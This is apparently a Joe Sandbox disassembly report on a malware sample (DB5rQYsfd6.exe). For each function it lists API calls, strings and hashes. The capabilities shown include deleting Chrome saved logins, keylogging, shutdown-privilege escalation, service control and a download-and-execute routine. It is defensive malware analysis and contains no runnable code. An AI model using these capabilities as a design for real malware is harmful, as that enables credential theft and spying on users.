Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 540abcb8f3db5f1b90760da06915a3e05ee1988b6862bc4c933283d7aac23dac
Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
Opcode Fuzzy Hash: 540abcb8f3db5f1b90760da06915a3e05ee1988b6862bc4c933283d7aac23dac
Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9

Function 0040A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
GetLastError.KERNEL32 ref: 0040A999

Strings

[Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
UserProfile, xrefs: 0040A95F
[Chrome StoredLogins not found], xrefs: 0040A9B3
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: de97d65e3799a6e0596e62218f2c5adfc51664b458c632a8240d65e96125f996
Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
Opcode Fuzzy Hash: de97d65e3799a6e0596e62218f2c5adfc51664b458c632a8240d65e96125f996
Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF

Function 00415C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
GetLastError.KERNEL32 ref: 00415CDB

Strings

SeShutdownPrivilege, xrefs: 00415CB0

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5

Function 004513D4 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0045151A

Strings

1#QNAN, xrefs: 00452720
1#INF, xrefs: 00452727
1#IND, xrefs: 00452712
1#SNAN, xrefs: 00452719

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 589046edef66d61ef49ed9f9c63f4fb896bb0cb7d404074a64385ab32ff8d038
Instruction ID: 053c4da9c4e9401cc5e8c6747fb67a0461d28ab3294dbb24078e68a968df4fbd
Opcode Fuzzy Hash: 589046edef66d61ef49ed9f9c63f4fb896bb0cb7d404074a64385ab32ff8d038
Instruction Fuzzy Hash: 74C26D71E046288FDB25CE28DD407EAB3B5EB45306F1441EBD80DE7252E778AE898F45

Function 0040838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408393
__CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
FindClose.KERNEL32(00000000), ref: 004086F4

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$Exception@8FirstH_prologNextThrow
String ID:
API String ID: 242384754-0
Opcode ID: 44480e5af65fc277b0032a7779d8a5fca1e445452c2f644f1cfeefee86da47d8
Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
Opcode Fuzzy Hash: 44480e5af65fc277b0032a7779d8a5fca1e445452c2f644f1cfeefee86da47d8
Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98

Function 00409468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040949C
GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
GetKeyboardLayout.USER32(00000000), ref: 004094AE
GetKeyState.USER32(00000010), ref: 004094B8
GetKeyboardState.USER32(?), ref: 004094C5
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
String ID:
API String ID: 3566172867-0
Opcode ID: fb31a49d7b713d020a20d08ecca38714848a3f936d0bc64d24338e42dde13448
Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
Opcode Fuzzy Hash: fb31a49d7b713d020a20d08ecca38714848a3f936d0bc64d24338e42dde13448
Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4

Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 4a984d4e7a6e451d1891994230232e3494b40b2086f34394cb7f46f36756c8ae
Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
Opcode Fuzzy Hash: 4a984d4e7a6e451d1891994230232e3494b40b2086f34394cb7f46f36756c8ae
Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9

Function 00417AAB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228

Strings

`'G, xrefs: 00417C7E
@8T, xrefs: 00417BA1
`'G, xrefs: 00417DE4

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: @8T$`'G$`'G
API String ID: 341183262-3126820404
Opcode ID: 8d751cc80bdca3fd2b46b50924137652240b5166e6d2558aa7bf39edfd0ff906
Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
Opcode Fuzzy Hash: 8d751cc80bdca3fd2b46b50924137652240b5166e6d2558aa7bf39edfd0ff906
Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A

Function 00414DB4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB

ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
GetProcAddress.KERNEL32(00000000), ref: 00414E72

Strings

PowrProf.dll, xrefs: 00414E66
SetSuspendState, xrefs: 00414E61

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: PowrProf.dll$SetSuspendState
API String ID: 1589313981-1420736420
Opcode ID: 08d91f060069d852ead358dd3820c496cb2f031836d8cba6e09d7269b4f00372
Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
Opcode Fuzzy Hash: 08d91f060069d852ead358dd3820c496cb2f031836d8cba6e09d7269b4f00372
Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE

Function 0044F61C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0044F6B5
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0044F6DE
GetACP.KERNEL32 ref: 0044F6F3

Strings

OCP, xrefs: 0044F670
ACP, xrefs: 0044F63A

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398

Function 0040A0B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
wsprintfW.USER32 ref: 0040A13F

Part of subcall function 0040962E: SetEvent.KERNEL32(00000000,?,00000000,0040A156,00000000), ref: 0040965A

Strings

Offline Keylogger Started, xrefs: 0040A0B7
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040A0C7
], xrefs: 0040A0CC

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: 607dbe55d9de5a05f86858bbd51a554e82fa839201e0fe66911a909e2b53e973
Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
Opcode Fuzzy Hash: 607dbe55d9de5a05f86858bbd51a554e82fa839201e0fe66911a909e2b53e973
Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9

Function 00419493 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE

Strings

SETTINGS, xrefs: 00419497

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SETTINGS
API String ID: 3473537107-594951305
Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19

Function 004087A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004087A5
FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
FindNextFileW.KERNEL32(00000000,?), ref: 00408846
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID:
API String ID: 1157919129-0
Opcode ID: 484577a562c9f558e50b26f0dbc178e9d2885c96ec1e9cce47e72067aeb176cc
Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
Opcode Fuzzy Hash: 484577a562c9f558e50b26f0dbc178e9d2885c96ec1e9cce47e72067aeb176cc
Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98

Function 0044F7F0 Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

Part of subcall function 00445725: _free.LIBCMT ref: 00445784
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791

GetUserDefaultLCID.KERNEL32 ref: 0044F8FC
IsValidCodePage.KERNEL32(00000000), ref: 0044F957
IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0044F9CD

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769

Function 00407848 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040784D
FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
__CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID:
API String ID: 1771804793-0
Opcode ID: 24543a1a10282cba8048a7387c3aa6f200ae2d1ca8a97a3849647739c1ea44b8
Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
Opcode Fuzzy Hash: 24543a1a10282cba8048a7387c3aa6f200ae2d1ca8a97a3849647739c1ea44b8
Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99

Function 00443700 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Strings

A%E, xrefs: 00443B68, 00443952, 004437E1
A%E, xrefs: 0044371D, 004438C8, 00443AEC, 00443A86, 00443916, 004438A4

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID: A%E$A%E
API String ID: 0-137320553
Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84

Function 004063C6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6

Strings

C:\Users\user\Desktop\DB5rQYsfd6.exe, xrefs: 0040651D, 00406645
open, xrefs: 004064CC

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
